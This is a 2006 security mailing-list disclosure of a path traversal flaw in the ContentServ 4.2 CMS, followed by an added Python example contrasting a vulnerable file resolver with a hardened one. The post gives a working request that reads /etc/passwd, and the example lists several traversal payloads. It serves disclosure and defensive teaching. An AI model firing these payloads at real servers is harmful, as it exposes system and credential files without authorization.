Network Security Vuln-Dev

Subject: contentserv 4.x
Date: Thu, 30 Nov 2006 18:12:28 +0100

ContentServ again (still) features remote reading of arbitrary files
====================================================================


ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continuously enhance 
our products and services.[...]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Let's forget the SQL injections for a moment, what if we try: 
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

Ooops!


have fun!


ps.: alex...when will you EVER learn?!



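The request above is a classic path traversal: a file-serving script joins the user-controlled `src` parameter onto its own directory and `../` segments walk out of the web root. The following is an added example, not code from the post or from ContentServ: a minimal Python model of that pattern, with the naive resolver beside a hardened one that canonicalises the path and refuses anything outside the real root. The web-root layout, function names and the payload list are assumptions made for the illustration.

```python
import os
import tempfile
from typing import Optional, Dict, Tuple
from urllib.parse import unquote


def naive_resolve(webroot: str, src: str) -> str:
    """Vulnerable pattern: join the decoded 'src' straight onto the web root.
    normpath() collapses '../' segments, so enough of them escape the root,
    which is the behaviour reported for FileServer.php."""
    return os.path.normpath(os.path.join(webroot, src))


def safe_resolve(webroot: str, src: str) -> Optional[str]:
    """Hardened resolver: decode once (as the web server does), reject NUL
    bytes, strip a leading slash so the parameter is always relative, then
    canonicalise with realpath() (follows symlinks) and require the result to
    stay inside the canonical web root. Returns None when the path escapes."""
    root = os.path.realpath(webroot)
    decoded = unquote(src)
    if "\x00" in decoded:
        return None
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/\\")))
    # commonpath() of the root and the candidate must be the root itself;
    # a plain startswith() check would wrongly accept '/var/www2' under '/var/www'.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def classify(webroot: str, payloads) -> Dict[str, Tuple[bool, bool]]:
    """For each payload return (naive_resolver_escapes_root, hardened_resolver_allows)."""
    root = os.path.realpath(webroot)
    results = {}
    for p in payloads:
        naive = naive_resolve(root, unquote(p))
        naive_escapes = os.path.commonpath([root, naive]) != root
        results[p] = (naive_escapes, safe_resolve(root, p) is not None)
    return results


# Constructed payloads: the one from the post, a URL-encoded variant,
# an absolute path, a partial traversal and a benign filename.
PAYLOADS = [
    "logo.png",
    "../../../../../etc/passwd",
    "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "/etc/passwd",
    "sub/../../etc/passwd",
]


def run_demo() -> Dict[str, Tuple[bool, bool]]:
    """Run the comparison against a throwaway directory standing in for
    .../contentserv/4.2/admin (assumed layout), so the example runs offline."""
    with tempfile.TemporaryDirectory() as webroot:
        return classify(webroot, PAYLOADS)


if __name__ == "__main__":
    for payload, (escapes, allowed) in run_demo().items():
        print(f"{payload:45s} naive escapes root: {escapes!s:5s}  hardened allows: {allowed}")
```

Note that the hardened version still serves `/etc/passwd`-style parameters, but only as a path relative to the root, which is the intended semantics of a file server; the decision it makes is purely "inside the root or not", which is why realpath() plus commonpath() is the check to carry over to whatever language the real script is written in.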
